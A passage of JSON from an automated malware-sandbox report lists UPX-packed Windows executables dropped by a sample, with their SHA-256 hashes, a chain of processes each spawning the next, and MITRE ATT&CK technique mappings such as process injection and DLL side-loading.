"description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "66608.exe (PID: 3268)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6666266.exe", "file_path": "C:\\6666266.exe", "file_size": 342567, "sha256": "506b71074925adbc45ad154f31fb31d73e39a37ad6cd9c7d4c181b0f50df7ebc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "00666.exe (PID: 2912)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "680284.exe", "file_path": "C:\\680284.exe", "file_size": 342855, "sha256": "64c84a35ad20fde3b2b9c93bd6e379d1c9673dbbc95424553c5a3c6818d7c8db", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "24640.exe (PID: 3880)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "80824.exe", "file_path": "C:\\80824.exe", "file_size": 342298, "sha256": "53b001065df24de878321c2c182858c8fcbc8a4dea310e8a2d902cd396bba741", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe (PID: 6116)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "82466.exe", "file_path": "C:\\82466.exe", "file_size": 342348, "sha256": "1421e9c5eb0b548460c9c5384da588b6f6ac20e1357216c25b49ba337573f828", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "420260.exe (PID: 5636)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8402600.exe", "file_path": "C:\\8402600.exe", "file_size": 343185, "sha256": "a05b3e7d47f32eb2f5a070469f3b80cbec3f71871c7d26ee3b72f679bfdfaa4e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8402600.exe (PID: 1348)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bdfnxb.exe", "file_path": "C:\\bdfnxb.exe", "file_size": 342903, "sha256": "90555bba4458b696d1d0b8dde7fc763a44a5e832c08d5dc0eb18d10ebd483c97", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6040224.exe (PID: 3688)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bpjjvll.exe", "file_path": "C:\\bpjjvll.exe", "file_size": 343052, "sha256": "1e08f01ab5888c955f50a452591f557eb8f3585a2506b39c352811ab65cce836", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bpjjvll.exe (PID: 3916)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ddvtj.exe", "file_path": "C:\\ddvtj.exe", "file_size": 342470, "sha256": "02feb87ce4036a4492dbc86a815d96677ce0e6a4a46e51bccece559475410ef4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ddvtj.exe (PID: 6072)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dhnnvp.exe", "file_path": "C:\\dhnnvp.exe", "file_size": 342785, "sha256": "a40d406c9b0ab9af0304f7d5a7388add77d2b9e5da8d42abd4bfa787c5ce7406", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dpdlf.exe (PID: 1500)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dltbld.exe", "file_path": "C:\\dltbld.exe", "file_size": 342799, "sha256": "63c7907a55d717628a36156130788764c50fe6a0b1d5138b5b2f9f14bb5ea04f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dhnnvp.exe (PID: 3188)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dpdlf.exe", "file_path": "C:\\dpdlf.exe", "file_size": 342775, "sha256": "8c9aa71901ffedb58cca353d317c5cc5f470b5ff83352344d7dbbecef8da39e6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "48628.exe (PID: 2744)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fdtfnb.exe", "file_path": "C:\\fdtfnb.exe", "file_size": 343024, "sha256": "72326c5fd9657b87a28b07d73744f82849b73c8eb22bf66ab7284eb8a4a60a4c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lbvfrdl.exe (PID: 720)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ftnpjx.exe", "file_path": "C:\\ftnpjx.exe", "file_size": 343089, "sha256": "3cefe0f2f9f201ad0b6da4c2eaabbcb29f9a99dddc3c6b8acd6b7bdf5215e6fb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ftnpjx.exe (PID: 1344)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hfbbnn.exe", "file_path": "C:\\hfbbnn.exe", "file_size": 342683, "sha256": "9ba07e643cb1872506e3b7a5fd054797af0bd2b4263bee6466a57e9c55b98f47", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "phxdv.exe (PID: 3308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hthbft.exe", "file_path": "C:\\hthbft.exe", "file_size": 342399, "sha256": "d4d67bcce0bcf5f819b222fd858368f680d6ca10ffc669ebae13fdc72feaf8c2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hthbft.exe (PID: 4304)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hvjtfdj.exe", "file_path": "C:\\hvjtfdj.exe", "file_size": 342366, "sha256": "1b21ffc3606517c79871ce196f4307290a2351b183b8f8c3b2f68e3fe79ccd88", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hvjtfdj.exe (PID: 5976)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hxfhrx.exe", "file_path": "C:\\hxfhrx.exe", "file_size": 342530, "sha256": "6c6157449ec72647622452e487e003be78ca8421cc0bb5d30b4b3785f23ab1fb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hxfhrx.exe (PID: 2404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hxtnlx.exe", "file_path": "C:\\hxtnlx.exe", "file_size": 342413, "sha256": "ad0a4b6434253022fe14b56a4b3acbfb3faadafe8b9d36690336d485b00e942c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hxtnlx.exe (PID: 6000)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jdjdt.exe", "file_path": "C:\\jdjdt.exe", "file_size": 342514, "sha256": "47f41cc9a99e4b1d9480535e74a4c97f4f6bae0db2a40dd192e04e2a474262a6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nthpjvt.exe (PID: 4372)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jvvxj.exe", "file_path": "C:\\jvvxj.exe", "file_size": 342918, "sha256": "4c80064025aae9361987e72df7b7eaee64c64049d9fbe62651298beae476a195", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jvvxj.exe (PID: 688)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lbvfrdl.exe", "file_path": "C:\\lbvfrdl.exe", "file_size": 343006, "sha256": "e95561cd3861841b286cd3117e0bffb5faea436562d29029662debf2020a9367", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lbvfrdl.exe (PID: 720)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ltnlpd.exe", "file_path": "C:\\ltnlpd.exe", "file_size": 342971, "sha256": "f80d7b71fbb8adcccb068ed483f94aa6b68a6598008dedd1ee5105843a28a142", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rhnlvvj.exe (PID: 468)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lvnptpp.exe", "file_path": "C:\\lvnptpp.exe", "file_size": 342604, "sha256": "f6bff9611d7cdde1bf65199c12c91ac2672562a111504068466f0edffab5f39a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lvnptpp.exe (PID: 580)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nhffd.exe", "file_path": "C:\\nhffd.exe", "file_size": 342986, "sha256": "7053810eb719825c61936790335b0c5fcbc4e48e98f2a24cee6f066e5a8c6ad8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nhffd.exe (PID: 664)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nhftnd.exe", "file_path": "C:\\nhftnd.exe", "file_size": 342384, "sha256": "2b9da158c8196810af76a67563565c679d50259440f77c36e6fa5ccbe69c7d7c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hvjtfdj.exe (PID: 5976)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nthpjvt.exe", "file_path": "C:\\nthpjvt.exe", "file_size": 342497, "sha256": "cf33035dcc30de0514ec6d8a1199cab37fc5b63a4f41951f37a9aa592efed8f8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xjhvjn.exe (PID: 4184)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pbdvnt.exe", "file_path": "C:\\pbdvnt.exe", "file_size": 343063, "sha256": "bbc3f8381a2a4a706aa2fbb3b65a3104f8d34530005eea4471f546b41d12d14c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pbdvnt.exe (PID: 3736)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pfflf.exe", "file_path": "C:\\pfflf.exe", "file_size": 342425, "sha256": "754856560d817a79c14dc09e07b5564ad4d7889c94d58c647770b55eb128031f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hxtnlx.exe (PID: 6000)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pftnv.exe", "file_path": "C:\\pftnv.exe", "file_size": 342454, "sha256": "b1217e7e37ab13bcc69375070bbd55d1f3da5dfd6daae58af676366334b79a96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xpvvjv.exe (PID: 1208)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "phxdv.exe", "file_path": "C:\\phxdv.exe", "file_size": 342672, "sha256": "64c4d2d8d7f57e428b8dc427468ccd90c562a52f4bc3d4ff3653cc404dae9350", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "phxdv.exe (PID: 3308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ptppdf.exe", "file_path": "C:\\ptppdf.exe", "file_size": 342934, "sha256": "5a8c41cdc2dd7351b3b4de1675be89c951ba2f3b56613373ee185332f7a10702", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jvvxj.exe (PID: 688)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rdflttb.exe", "file_path": "C:\\rdflttb.exe", "file_size": 342656, "sha256": "3d85e9c175ea0e6bda3538730f351453799fa623bb76fd9f38a835be730968e3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vnbvdx.exe (PID: 3712)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rhnlvvj.exe", "file_path": "C:\\rhnlvvj.exe", "file_size": 342952, "sha256": "e62e2d54725727f2bc395c42287c678655df13e37f43608402fd6644f2ad6e4d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rhnlvvj.exe (PID: 468)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rhpxblx.exe", "file_path": "C:\\rhpxblx.exe", "file_size": 343079, "sha256": "6dc60b12c645abc9bdc7fde39798344aabd34af23dcf383a568e6c308d06ffa5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pbdvnt.exe (PID: 3736)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rjffft.exe", "file_path": "C:\\rjffft.exe", "file_size": 342712, "sha256": "32408966d1bdd82e53049cf99b5a21e23a5e5ac16f976f70633147a0a25a563c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rjffft.exe (PID: 3992)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rjlbb.exe", "file_path": "C:\\rjlbb.exe", "file_size": 343107, "sha256": "5dba80a78a3e60f3082ce209447cde8b19f66d0e3324839329a9664f56e03f2b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rjlbb.exe (PID: 3968)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rjtxj.exe", "file_path": "C:\\rjtxj.exe", "file_size": 343235, "sha256": "4d459f8b892eb3b0101772f19657258f9a5e5c8ba065623e96cd6edd3fd3d44f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "60024.exe (PID: 1356)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rpdjn.exe", "file_path": "C:\\rpdjn.exe", "file_size": 342701, "sha256": "b5e4346664ec076c0c456e9d7ceecef437edacc618cf0e27c7d61976a226184b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hfbbnn.exe (PID: 3252)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rtdhhn.exe", "file_path": "C:\\rtdhhn.exe", "file_size": 343245, "sha256": "2b1684125b4320c7d64d41abb402a0988c1d6bf28460f7bd0ccc17d557d3528c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rjtxj.exe (PID: 2056)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tfftdr.exe", "file_path": "C:\\tfftdr.exe", "file_size": 343168, "sha256": "49078579c3d3fb96c2a09863f692d3fc6ffbae303e2bc86fe2d9112420208c11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tjbljn.exe (PID: 2736)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tjbljn.exe", "file_path": "C:\\tjbljn.exe", "file_size": 343154, "sha256": "4fdddbe6403554caea05e685e808199962c5cfcf330111148358ffcd6b936f93", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tjbljn.exe (PID: 2736)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tjphthx.exe", "file_path": "C:\\tjphthx.exe", "file_size": 343037, "sha256": "07c57c0d2a51f8cb0d2ab8f327dd5bb335e87a1aa4b973e4de3e795948354155", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fdtfnb.exe (PID: 1328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vfdlx.exe", "file_path": "C:\\vfdlx.exe", "file_size": 343121, "sha256": "fd08e661784f732ea66d346feed9cc3753533ba327e0fb01d02e2de4a558f477", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rjlbb.exe (PID: 3968)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vlvdf.exe", "file_path": "C:\\vlvdf.exe", "file_size": 342619, "sha256": "c9b5fc227bef89981e72d27461a857f12710e0c8e3d7b28f0a205761f80b035d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lvnptpp.exe (PID: 580)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vnbvdx.exe", "file_path": "C:\\vnbvdx.exe", "file_size": 342638, "sha256": "5aa8e710c3881445065afabd946b9a42d7b37f36c59ec649a0164a5be59ea22a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vnbvdx.exe (PID: 3712)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xdnld.exe", "file_path": "C:\\xdnld.exe", "file_size": 343137, "sha256": "879947ea41b111398cae472de847f7aa7370378c6f5bfb05af5b2dda3c0ed495", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vfdlx.exe (PID: 2680)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xjhvjn.exe", "file_path": "C:\\xjhvjn.exe", "file_size": 342484, "sha256": "fe255099ba21082ecbb62e6394e05ee38fa56d14ef111b5a663292d2d1c0b1d1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xjhvjn.exe (PID: 4184)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xpvvjv.exe", "file_path": "C:\\xpvvjv.exe", "file_size": 342440, "sha256": "f9008cd91e935165313fe3a1f1809b5bf139ee6f8386fb0f84e753e480ecf93c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pfflf.exe (PID: 2412)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "088822.exe", "file_size": 343443, "sha256": "c211fcbe4012cb427b139d523c16453e8b274557438023c728b3e31970aef29e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xvndjvv.exe", "file_size": 343426, "sha256": "5f37cd9701f2d3b1624d05b70e881388d43192f10b2678fb97100cccec4a7b4c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "60884.exe", "file_size": 343409, "sha256": "9a3ec93ddde03844dd939801f95b37c9bc13662822e163b11aa3da98739988d2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ldrttb.exe", "file_size": 343399, "sha256": "5bb70ab064cd5727aa7cfeda33a15d39eac4eeefee67daf646f39770c0f62ae3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rfhlpxb.exe", "file_size": 343388, "sha256": "148868309f60cdc21fb1c4fc69491e7626223325037d63587d813bbcfe20675d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8668622.exe", "file_size": 343372, "sha256": "96197aeba806323bd21b4b4de7e87ea23dff5c6846a66b34a8ef983977071cea", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "68646.exe", "file_size": 343353, "sha256": "49002f83657d8650aafd582341185b97408167ee2dd1b2de8f38c84d422765c9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6844880.exe", "file_size": 343333, "sha256": "540a9bbc8575596f804170b6bda9e1121221ec47ce89926d11c0c3878cb155af", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ljvbrr.exe", "file_size": 343314, "sha256": "87ba29973b7c769bfc284ce2a03031dfdb0a4f170b480af656d6e8682f49d98d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rxvjbx.exe", "file_size": 343304, "sha256": "eff03773162dcd7ca039bf3a51bff485bdde08a969ad6b644f934d9f809fe4fe", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "frbnhn.exe", "file_size": 343294, "sha256": "b6ff1e727fa9f1b9bdf5934b7533e2c80ab01c5b7542d0262acb0155d0a147d1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dthhtb.exe", "file_size": 343275, "sha256": "8642b51453a19f95d10348c7acf038854e275ba6ad2049a78a38e251c4954a63", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hxpnnf.exe", "file_size": 343259, "sha256": "905306d2a38d8d0efffd8d7e6e3efeec2dfc3c89bb4f7ac2cd5663cdd14d0093", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00006116", "name": "dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe", "normalized_path": "C:\\dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe", "sha256": "dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9"}, {"uid": "00000000-00006128", "parentuid": "00000000-00006116", "name": "80824.exe", "normalized_path": "c:\\80824.exe", "sha256": "53b001065df24de878321c2c182858c8fcbc8a4dea310e8a2d902cd396bba741"}, {"uid": "00000000-00005872", "parentuid": "00000000-00006128", "name": "466844.exe", "normalized_path": "c:\\466844.exe", "sha256": "c1253d92b9e6e6432ed7b9900426ee9cee002e91091752d8ca78159d8b887e11"}, {"uid": "00000000-00005636", "parentuid": "00000000-00005872", "name": "420260.exe", "normalized_path": "c:\\420260.exe", "sha256": "7e34eeece784db84503757bdf81ded19e8666bcc3dad90cd1b8b98ba86560712"}, {"uid": "00000000-00004108", "parentuid": "00000000-00005636", "name": "82466.exe", "normalized_path": "c:\\82466.exe", "sha256": "1421e9c5eb0b548460c9c5384da588b6f6ac20e1357216c25b49ba337573f828"}, {"uid": "00000000-00005976", "parentuid": "00000000-00004108", "name": "hvjtfdj.exe", "normalized_path": "c:\\hvjtfdj.exe", "sha256": "1b21ffc3606517c79871ce196f4307290a2351b183b8f8c3b2f68e3fe79ccd88"}, {"uid": "00000000-00005988", "parentuid": "00000000-00005976", "name": "nhftnd.exe", "normalized_path": "c:\\nhftnd.exe", "sha256": "2b9da158c8196810af76a67563565c679d50259440f77c36e6fa5ccbe69c7d7c"}, {"uid": "00000000-00004304", "parentuid": "00000000-00005988", "name": "hthbft.exe", "normalized_path": "c:\\hthbft.exe", "sha256": "d4d67bcce0bcf5f819b222fd858368f680d6ca10ffc669ebae13fdc72feaf8c2"}, {"uid": "00000000-00006000", "parentuid": "00000000-00004304", "name": "hxtnlx.exe", "normalized_path": "c:\\hxtnlx.exe", "sha256": "ad0a4b6434253022fe14b56a4b3acbfb3faadafe8b9d36690336d485b00e942c"}, {"uid": "00000000-00002412", "parentuid": "00000000-00006000", "name": "pfflf.exe", "normalized_path": "c:\\pfflf.exe", "sha256": "754856560d817a79c14dc09e07b5564ad4d7889c94d58c647770b55eb128031f"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": 